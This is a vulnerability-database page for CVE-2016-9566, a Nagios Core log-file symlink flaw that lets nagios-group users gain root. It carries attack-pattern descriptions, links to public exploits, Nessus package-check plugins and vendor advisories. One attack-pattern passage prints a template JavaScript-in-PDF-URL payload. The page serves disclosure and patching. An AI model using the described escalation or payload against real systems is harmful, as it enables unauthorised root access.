Vulnerabilities > CVE-2016-9566 - Link Following vulnerability in Nagios

047910
CVSS 7.8 - HIGH
Attack vector
LOCAL
Attack complexity
LOW
Privileges required
LOW
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
local
low complexity
nagios
CWE-59
nessus
exploit available

Summary

base/logging.c in Nagios Core before 4.2.4 allows local users with access to an account in the nagios group to gain root privileges via a symlink attack on the log file. NOTE: this can be leveraged by remote attackers using CVE-2016-9565.

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Symlink Attack
    An attacker positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name. The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications. In some variants of this attack the attacker may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the attacker may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the attacker to control the actions of the target or to cause the target to expose information to the attacker. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the attacker would normally have.
  • Accessing, Modifying or Executing Executable Files
    An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
  • Leverage Executable Code in Non-Executable Files
    An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
  • Manipulating Input to File System Calls
    An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

Exploit-Db

  • descriptionNagios Core < 4.2.4 - Privilege Escalation. CVE-2016-9566. Local exploit for Linux platform. Tags: Local
    fileexploits/linux/local/40921.sh
    idEDB-ID:40921
    last seen2016-12-15
    modified2016-12-15
    platformlinux
    port
    published2016-12-15
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/40921/
    titleNagios Core < 4.2.4 - Privilege Escalation
    typelocal
  • descriptionNagios Core < 4.2.2 - Curl Command Injection / Remote Code Execution. CVE-2016-9565. Remote exploit for Linux platform. Tags: Remote
    fileexploits/linux/remote/40920.py
    idEDB-ID:40920
    last seen2016-12-15
    modified2016-12-15
    platformlinux
    port
    published2016-12-15
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/40920/
    titleNagios Core < 4.2.2 - Curl Command Injection / Remote Code Execution
    typeremote

Nessus

  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DLA-1615.NASL
    descriptionSeveral issues were corrected in nagios3, a monitoring and management system for hosts, services and networks. CVE-2018-18245 Maximilian Boehner of usd AG found a cross-site scripting (XSS) vulnerability in Nagios Core. This vulnerability allows attackers to place malicious JavaScript code into the web frontend through manipulation of plugin output. In order to do this the attacker needs to be able to manipulate the output returned by nagios checks, e.g. by replacing a plugin on one of the monitored endpoints. Execution of the payload then requires that an authenticated user creates an alert summary report which contains the corresponding output. CVE-2016-9566 It was discovered that local users with access to an account in the nagios group are able to gain root privileges via a symlink attack on the debug log file. CVE-2014-1878 An issue was corrected that allowed remote attackers to cause a stack-based buffer overflow and subsequently a denial of service (segmentation fault) via a long message to cmd.cgi. CVE-2013-7205 | CVE-2013-7108 A flaw was corrected in Nagios that could be exploited to cause a denial of service. This vulnerability is induced due to an off-by-one error within the process_cgivars() function, which can be exploited to cause an out-of-bounds read by sending a specially crafted key value to the Nagios web UI. For Debian 8
    last seen2020-03-26
    modified2018-12-27
    plugin id119875
    published2018-12-27
    reporterThis script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/119875
    titleDebian DLA-1615-1 : nagios3 security update
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Debian Security Advisory DLA-1615-1. The text
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(119875);
      script_version("1.4");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/03/25");
    
      script_cve_id("CVE-2013-7108", "CVE-2013-7205", "CVE-2014-1878", "CVE-2016-9566", "CVE-2018-18245");
      script_bugtraq_id(64363, 64489, 65605);
    
      script_name(english:"Debian DLA-1615-1 : nagios3 security update");
      script_summary(english:"Checks dpkg output for the updated packages.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Several issues were corrected in nagios3, a monitoring and management
    system for hosts, services and networks.
    
    CVE-2018-18245
    
    Maximilian Boehner of usd AG found a cross-site scripting (XSS)
    vulnerability in Nagios Core. This vulnerability allows attackers to
    place malicious JavaScript code into the web frontend through
    manipulation of plugin output. In order to do this the attacker needs
    to be able to manipulate the output returned by nagios checks, e.g. by
    replacing a plugin on one of the monitored endpoints. Execution of the
    payload then requires that an authenticated user creates an alert
    summary report which contains the corresponding output.
    
    CVE-2016-9566
    
    It was discovered that local users with access to an account in the
    nagios group are able to gain root privileges via a symlink attack on
    the debug log file.
    
    CVE-2014-1878
    
    An issue was corrected that allowed remote attackers to cause a
    stack-based buffer overflow and subsequently a denial of service
    (segmentation fault) via a long message to cmd.cgi.
    
    CVE-2013-7205 | CVE-2013-7108
    
    A flaw was corrected in Nagios that could be exploited to cause a
    denial of service. This vulnerability is induced due to an off-by-one
    error within the process_cgivars() function, which can be exploited to
    cause an out-of-bounds read by sending a specially crafted key value
    to the Nagios web UI.
    
    For Debian 8 'Jessie', these problems have been fixed in version
    3.5.1.dfsg-2+deb8u1.
    
    We recommend that you upgrade your nagios3 packages.
    
    NOTE: Tenable Network Security has extracted the preceding description
    block directly from the DLA security advisory. Tenable has attempted
    to automatically clean and format it as much as possible without
    introducing additional issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://lists.debian.org/debian-lts-announce/2018/12/msg00014.html"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://packages.debian.org/source/jessie/nagios3"
      );
      script_set_attribute(attribute:"solution", value:"Upgrade the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3-cgi");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3-common");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3-core");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3-dbg");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:nagios3-doc");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:8.0");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2014/01/15");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/12/24");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/12/27");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"8.0", prefix:"nagios3", reference:"3.5.1.dfsg-2+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"nagios3-cgi", reference:"3.5.1.dfsg-2+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"nagios3-common", reference:"3.5.1.dfsg-2+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"nagios3-core", reference:"3.5.1.dfsg-2+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"nagios3-dbg", reference:"3.5.1.dfsg-2+deb8u1")) flag++;
    if (deb_check(release:"8.0", prefix:"nagios3-doc", reference:"3.5.1.dfsg-2+deb8u1")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2017-100.NASL
    descriptionThis update for icinga includes various upstream fixes and the following security security fixes : - icinga was updated to version 1.14.0 - the classic-UI was vulnerable to a cross site scripting attack (CVE-2015-8010, boo#952777) - A user with nagios privileges could have gained root privileges by placing a symbolic link at the logfile location (CVE-2016-9566, boo#1014637)
    last seen2020-06-05
    modified2017-01-17
    plugin id96545
    published2017-01-17
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/96545
    titleopenSUSE Security Update : icinga (openSUSE-2017-100)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from openSUSE Security Update openSUSE-2017-100.
    #
    # The text description of this plugin is (C) SUSE LLC.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(96545);
      script_version("3.4");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");
    
      script_cve_id("CVE-2015-8010", "CVE-2016-9566");
    
      script_name(english:"openSUSE Security Update : icinga (openSUSE-2017-100)");
      script_summary(english:"Check for the openSUSE-2017-100 patch");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote openSUSE host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "This update for icinga includes various upstream fixes and the
    following security security fixes :
    
      - icinga was updated to version 1.14.0
    
      - the classic-UI was vulnerable to a cross site scripting
        attack (CVE-2015-8010, boo#952777)
    
      - A user with nagios privileges could have gained root
        privileges by placing a symbolic link at the logfile
        location (CVE-2016-9566, boo#1014637)"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1014637"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bugzilla.opensuse.org/show_bug.cgi?id=952777"
      );
      script_set_attribute(
        attribute:"solution", 
        value:"Update the affected icinga packages."
      );
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-debugsource");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-devel");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-idoutils");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-idoutils-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-idoutils-mysql");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-idoutils-oracle");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-idoutils-pgsql");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-plugins-downtimes");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-plugins-eventhandlers");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-www");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-www-config");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:icinga-www-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:monitoring-tools");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:monitoring-tools-debuginfo");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.1");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.2");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2017/01/16");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/17");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"SuSE Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/SuSE/release");
    if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
    if (release !~ "^(SUSE42\.1|SUSE42\.2)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.1 / 42.2", release);
    if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    ourarch = get_kb_item("Host/cpu");
    if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
    if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);
    
    flag = 0;
    
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-debuginfo-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-debugsource-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-devel-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-idoutils-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-idoutils-debuginfo-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-idoutils-mysql-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-idoutils-oracle-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-idoutils-pgsql-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-plugins-downtimes-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-plugins-eventhandlers-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-www-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-www-config-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"icinga-www-debuginfo-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"monitoring-tools-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.1", reference:"monitoring-tools-debuginfo-1.14.0-3.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-debuginfo-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-debugsource-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-devel-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-idoutils-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-idoutils-debuginfo-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-idoutils-mysql-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-idoutils-oracle-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-idoutils-pgsql-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-plugins-downtimes-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-plugins-eventhandlers-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-www-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-www-config-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"icinga-www-debuginfo-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"monitoring-tools-1.14.0-4.1") ) flag++;
    if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"monitoring-tools-debuginfo-1.14.0-4.1") ) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "icinga / icinga-debuginfo / icinga-debugsource / icinga-devel / etc");
    }
    
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-0259.NASL
    descriptionAn update for nagios is now available for Red Hat Gluster Storage 3.1 for RHEL 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Nagios is a program that monitors hosts and services on your network, and has the ability to send email or page alerts when a problem arises or is resolved. Security Fix(es) : * It was found that an attacker who could control the content of an RSS feed could execute code remotely using the Nagios web interface. This flaw could be used to gain access to the remote system and in some scenarios control over the system. (CVE-2016-9565) * A privilege escalation flaw was found in the way Nagios handled log files. An attacker able to control the Nagios logging configuration (the
    last seen2020-06-01
    modified2020-06-02
    plugin id97061
    published2017-02-08
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97061
    titleRHEL 6 : nagios (RHSA-2017:0259)
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DLA-751.NASL
    descriptionNagios was found to be vulnerable to two security issues that, when combined, lead to a remote root code execution vulnerability. Fortunately, the hardened permissions of the Debian package limit the effect of those to information disclosure, but privilege escalation to root is still possible locally. CVE-2016-9565 Improper sanitization of RSS feed input enables unauthenticated remote read and write of arbitrary files which may lead to remote code execution if the web root is writable. CVE-2016-9566 Unsafe logfile handling allows unprivileged users to escalate their privileges to root. In wheezy, this is possible only through the debug logfile which is disabled by default. For Debian 7
    last seen2020-03-17
    modified2016-12-20
    plugin id96012
    published2016-12-20
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/96012
    titleDebian DLA-751-1 : nagios3 security update
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3253-2.NASL
    descriptionUSN-3253-1 fixed vulnerabilities in Nagios. The update prevented log files from being displayed in the web interface. This update fixes the problem. We apologize for the inconvenience. It was discovered that Nagios incorrectly handled certain long strings. A remote authenticated attacker could use this issue to cause Nagios to crash, resulting in a denial of service, or possibly obtain sensitive information. (CVE-2013-7108, CVE-2013-7205) It was discovered that Nagios incorrectly handled certain long messages to cmd.cgi. A remote attacker could possibly use this issue to cause Nagios to crash, resulting in a denial of service. (CVE-2014-1878) Dawid Golunski discovered that Nagios incorrectly handled symlinks when accessing log files. A local attacker could possibly use this issue to elevate privileges. In the default installation of Ubuntu, this should be prevented by the Yama link restrictions. (CVE-2016-9566). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id100677
    published2017-06-08
    reporterUbuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/100677
    titleUbuntu 14.04 LTS / 16.04 LTS / 16.10 / 17.04 : nagios3 regression (USN-3253-2)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-0258.NASL
    descriptionAn update for nagios is now available for Red Hat Gluster Storage 3.1 for RHEL 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Nagios is a program that monitors hosts and services on your network, and has the ability to send email or page alerts when a problem arises or is resolved. Security Fix(es) : * It was found that an attacker who could control the content of an RSS feed could execute code remotely using the Nagios web interface. This flaw could be used to gain access to the remote system and in some scenarios control over the system. (CVE-2016-9565) * A privilege escalation flaw was found in the way Nagios handled log files. An attacker able to control the Nagios logging configuration (the
    last seen2020-06-01
    modified2020-06-02
    plugin id97060
    published2017-02-08
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97060
    titleRHEL 7 : nagios (RHSA-2017:0258)
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201702-26.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201702-26 (Nagios: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in Nagios. Please review the CVE identifiers referenced below for details. Impact : A local attacker, who either is already Nagios&rsquo;s system user or belongs to Nagios&rsquo;s group, could potentially escalate privileges. In addition, a remote attacker could read or write to arbitrary files by spoofing a crafted response from the Nagios RSS feed server. Workaround : There is no known workaround at this time.
    last seen2020-06-01
    modified2020-06-02
    plugin id97269
    published2017-02-21
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97269
    titleGLSA-201702-26 : Nagios: Multiple vulnerabilities
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2017-D270E932A3.NASL
    descriptionUpdate to close CVE Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-05
    modified2018-01-15
    plugin id105984
    published2018-01-15
    reporterThis script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/105984
    titleFedora 27 : nagios (2017-d270e932a3)
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201612-51.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201612-51 (Icinga: Privilege escalation) Icinga daemon was found to perform unsafe operations when handling the log file. Impact : A local attacker, who either is already Icinga&rsquo;s system user or belongs to Icinga&rsquo;s group, could potentially escalate privileges. Workaround : There is no known workaround at this time.
    last seen2020-06-01
    modified2020-06-02
    plugin id96226
    published2017-01-03
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/96226
    titleGLSA-201612-51 : Icinga: Privilege escalation
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201710-20.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201710-20 (Nagios: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in Nagios. Please review the referenced CVE identifiers for details. Impact : A remote attacker could possibly escalate privileges to root, thus allowing the execution of arbitrary code, by leveraging CVE-2016-9565. Additionally, a local attacker could cause a Denial of Service condition against arbitrary processes due to the improper dropping of privileges. Workaround : There is no known workaround at this time.
    last seen2020-06-01
    modified2020-06-02
    plugin id103913
    published2017-10-18
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/103913
    titleGLSA-201710-20 : Nagios: Multiple vulnerabilities
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3253-1.NASL
    descriptionIt was discovered that Nagios incorrectly handled certain long strings. A remote authenticated attacker could use this issue to cause Nagios to crash, resulting in a denial of service, or possibly obtain sensitive information. (CVE-2013-7108, CVE-2013-7205) It was discovered that Nagios incorrectly handled certain long messages to cmd.cgi. A remote attacker could possibly use this issue to cause Nagios to crash, resulting in a denial of service. (CVE-2014-1878) Dawid Golunski discovered that Nagios incorrectly handled symlinks when accessing log files. A local attacker could possibly use this issue to elevate privileges. In the default installation of Ubuntu, this should be prevented by the Yama link restrictions. (CVE-2016-9566). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id99182
    published2017-04-04
    reporterUbuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/99182
    titleUbuntu 14.04 LTS / 16.04 LTS / 16.10 : nagios3 vulnerabilities (USN-3253-1)
  • NASL familyAmazon Linux Local Security Checks
    NASL idALA_ALAS-2017-899.NASL
    descriptionMultiple off-by-one errors in Nagios Core 3.5.1, 4.0.2, and earlier, and Icinga before 1.8.5, 1.9 before 1.9.4, and 1.10 before 1.10.2 allow remote authenticated users to obtain sensitive information from process memory or cause a denial of service (crash) via a long string in the last key value in the variable list to the process_cgivars function in (1) avail.c, (2) cmd.c, (3) config.c, (4) extinfo.c, (5) histogram.c, (6) notifications.c, (7) outages.c, (8) status.c, (9) statusmap.c, (10) summary.c, and (11) trends.c in cgi/, which triggers a heap-based buffer over-read. Stack-based buffer overflow in the cmd_submitf function in cgi/cmd.c in Nagios Core, possibly 4.0.3rc1 and earlier, and Icinga before 1.8.6, 1.9 before 1.9.5, and 1.10 before 1.10.3 allows remote attackers to cause a denial of service (segmentation fault) via a long message to cmd.cgi. Various command-execution flaws were found in the Snoopy library included with Nagios. These flaws allowed remote attackers to execute arbitrary commands by manipulating Nagios HTTP headers. A privilege escalation flaw was found in the way Nagios handled log files. An attacker able to control the Nagios logging configuration (the
    last seen2020-06-01
    modified2020-06-02
    plugin id103651
    published2017-10-04
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/103651
    titleAmazon Linux AMI : nagios (ALAS-2017-899)

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/140169/nagioscore-exec.txt
idPACKETSTORM:140169
last seen2016-12-15
published2016-12-15
reporterDawid Golunski
sourcehttps://packetstormsecurity.com/files/140169/Nagios-Core-Curl-Command-Injection-Code-Execution.html
titleNagios Core Curl Command Injection / Code Execution

Redhat

advisories
  • rhsa
    idRHSA-2017:0211
  • rhsa
    idRHSA-2017:0212
  • rhsa
    idRHSA-2017:0213
  • rhsa
    idRHSA-2017:0214
  • rhsa
